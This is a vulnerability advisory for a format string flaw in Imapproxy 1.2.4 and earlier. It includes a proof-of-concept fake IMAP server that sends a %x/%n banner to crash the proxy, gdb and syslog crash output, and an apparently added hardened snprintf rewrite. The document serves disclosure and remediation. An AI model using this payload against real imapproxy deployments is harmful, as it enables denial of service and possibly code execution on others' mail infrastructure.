A format string vulnerability exists in Imapproxy versions 1.2.4 and below. Proof of concept exploit included.
a957e64eb23300ef5bd04f9396a66646f9eb4e1d06921f1eaf18205dd93c00f5
[.:: ExploiterZ Labs aka Unl0ck Research Team ::.]
Advisory
target: Imapproxy
version: 1.2.4 and earlier
type: format string
remote: yes
vendor: http://imapproxy.org
patch: none available
[.: Details :.]
A format string vulnerability was found in the latest version
of the IMAP proxy server (up-imapproxy).
Vulnerability exists in:
/up-imapproxy-1.2.4/src/main.c
function: ParseBannerAndCapability();
static int ParseBannerAndCapability( char *DestBuf,
                                     unsigned int DestBufSize,
                                     char *SourceBuf,
                                     unsigned int SourceBufSize )
{
    ...
    SourceBuf[SourceBufSize - 2] = '\0';
    CP = strtok( SourceBuf, " " );
    ...
    sprintf( DestBuf, CP );
    ...
}
This function is called from another function in main.c:
function: SetBannerAndCapability()
static void SetBannerAndCapability( void )
{
    ...
    BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1,
                                          itd.ReadBuf, BytesRead );
    ...
    if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) )
    {
        syslog(LOG_ERR, "%s: Unexpected response from imap server on initial connection: %s -- Exiting.", fn, Banner);
        close( itd.conn->sd );
        exit( 1 );
    }
    ...
}
As you can see, ParseBannerAndCapability() passes CP, a token taken straight from the IMAP server's banner, to sprintf() as the format string.
The correct call is:
sprintf( DestBuf, "%s", CP );
instead of
sprintf( DestBuf, CP );
Because the banner is read from the backend IMAP server, whoever controls the server imapproxy connects to (or the network path to it) controls the format string: %x directives read values off the stack and %n directives write to memory, so the vulnerability can be used to execute arbitrary code on the target machine. Imapproxy does not sanitize the banner it receives from the IMAP daemon. The PoC code below demonstrates the crash.
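The following is an added example, not code from this advisory or from up-imapproxy. It reimplements the banner parsing excerpt above in a hardened form: the trailing CRLF is cut off and the banner is split on spaces as in the original, but every token is copied with an explicit "%s" format and an output bound (snprintf), so '%' sequences arriving in the banner are stored as data and never interpreted. Looping over all tokens and re-joining them with spaces is an assumption about the elided code (the excerpt shows only one token copy); the "* OK" acceptance test mirrors SetBannerAndCapability(). Note that sprintf( DestBuf, "%s", CP ) alone removes the format string bug but not the unbounded copy into DestBuf, which is why the example passes DestBufSize through to snprintf. The two sample banners are constructed: a normal greeting and the banner the PoC sends.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define IMAP_UNTAGGED_OK "* OK"

/* Hardened rewrite of the banner parser (added example, not up-imapproxy
 * code). Same steps as the excerpt: cut the trailing CRLF, tokenize on
 * spaces, copy into DestBuf. The copy uses an explicit "%s" format so the
 * token is an argument, and snprintf bounds the write to DestBufSize.
 * Returns the stored length, or -1 if the banner is malformed or does not fit.
 * Re-joining all tokens with spaces is an assumption about the elided code. */
static int parse_banner_fixed(char *DestBuf, size_t DestBufSize,
                              char *SourceBuf, size_t SourceBufSize)
{
    char *CP;
    size_t used = 0;
    int n;

    if (SourceBufSize < 2 || DestBufSize == 0)
        return -1;
    SourceBuf[SourceBufSize - 2] = '\0';      /* drop "\r\n", as the original does */
    DestBuf[0] = '\0';

    for (CP = strtok(SourceBuf, " "); CP != NULL; CP = strtok(NULL, " ")) {
        if (used > 0) {                       /* separator between tokens */
            if (used + 1 >= DestBufSize)
                return -1;
            DestBuf[used++] = ' ';
            DestBuf[used] = '\0';
        }
        /* NOT sprintf(DestBuf, CP): "%s" is the format, CP is an argument */
        n = snprintf(DestBuf + used, DestBufSize - used, "%s", CP);
        if (n < 0 || (size_t)n >= DestBufSize - used)
            return -1;                        /* truncated: refuse rather than overflow */
        used += (size_t)n;
    }
    return (int)used;
}

/* Mirrors the acceptance test in SetBannerAndCapability(): the proxy only
 * continues when the banner starts with "* OK" (case-insensitive). */
static int banner_accepted(const char *Banner)
{
    return strncasecmp(Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) == 0;
}

/* Feeds one banner as read off the wire (length = bytes read, CRLF included)
 * through the parser and the acceptance test. The input is copied first
 * because strtok writes into it. */
static int run_banner(const char *wire, char *out, size_t outsz, int *accepted)
{
    char src[512];
    size_t len = strlen(wire);
    int n;

    *accepted = 0;
    if (len >= sizeof src)
        return -1;
    memcpy(src, wire, len + 1);
    n = parse_banner_fixed(out, outsz, src, len);
    if (n >= 0)
        *accepted = banner_accepted(out);
    return n;
}

int main(void)
{
    /* constructed inputs: a normal greeting and the PoC's format-string banner */
    const char *banners[] = {
        "* OK IMAP4rev1 server ready\r\n",
        "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n",
    };
    char out[64];
    int accepted, n;
    size_t i;

    for (i = 0; i < sizeof banners / sizeof banners[0]; i++) {
        n = run_banner(banners[i], out, sizeof out, &accepted);
        printf("stored %d bytes, accepted=%d: [%s]\n", n, accepted, out);
    }
    /* a destination too small for the greeting is refused, not overflowed */
    n = run_banner(banners[0], out, 16, &accepted);
    printf("16-byte dest: %d\n", n);
    return 0;
}
```

Running it stores the greeting (27 bytes) and accepts it, stores the PoC banner verbatim (28 bytes, still ending in the one CRLF that the original's SourceBufSize - 2 cut leaves behind) and rejects it on the "* OK" check, and returns -1 for a 16-byte destination instead of writing past it.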
[.: PoC :.]
/*
PoC exploit code for up-imapproxy <= 1.2.4
by Darkeagle from ExploiterZ Labs
eagle [ at ] exploiterz [ dot ] org
The exploit acts as a fake IMAP server bound to port 143; when imapproxy connects to it and reads the banner, the proxy's child process crashes.
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>

/* banner handed to the proxy: padding, five %x to walk up the stack,
   three %n writes, then the CRLFs that end the IMAP greeting line */
#define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"

int main ( int argc, char *argv[] )
{
    struct sockaddr_in addr, cl_addr;
    int sock, cl_sock;
    char *Iaddr;
    socklen_t l;

    printf("Imapproxy <= 1.2.4 PoC Exploit\n");

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (sock < 0) { perror("socket"); return 1; }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(143);                 /* binding 143 needs root */
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    if (bind(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0) { perror("bind"); return 1; }
    if (listen(sock, 5) < 0) { perror("listen"); return 1; }

    /* serve every proxy connection the same banner */
    while (1)
    {
        l = sizeof(cl_addr);                    /* accept() needs the length set on entry */
        cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
        if (cl_sock < 0) { perror("accept"); continue; }
        Iaddr = inet_ntoa(cl_addr.sin_addr);
        send(cl_sock, BANNER, strlen(BANNER), 0);
        printf("IP: %s\n", Iaddr);
        close(cl_sock);
    }
    return 0;
}
[.: Screenshot :.]
.. Child Process crashed ..
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1076593408 (LWP 8279)]
0x401b5904 in vfprintf () from /lib/tls/libc.so.6
(gdb)
...
.. Syslog details ..
[root@localhost bin]# tail -10 /var/log/syslog
....
Oct 28 14:12:55 localhost in.imapproxyd[9201]: SetBannerAndCapability(): Unexpected response from imap server on initial connection: AAAAAAAAAbfffc4ccbfffc4ccbfffc4b45bfffd4e8804afb98056E60^M -- Exiting.
[root@localhost bin]#
[.: Credits :.]
Goes to Darkeagle [ eagle { at } exploiterz { dot } org ]
http://exploiterz.org || http://55k7.org
(c) 2004-2005 Unl0ck Research Team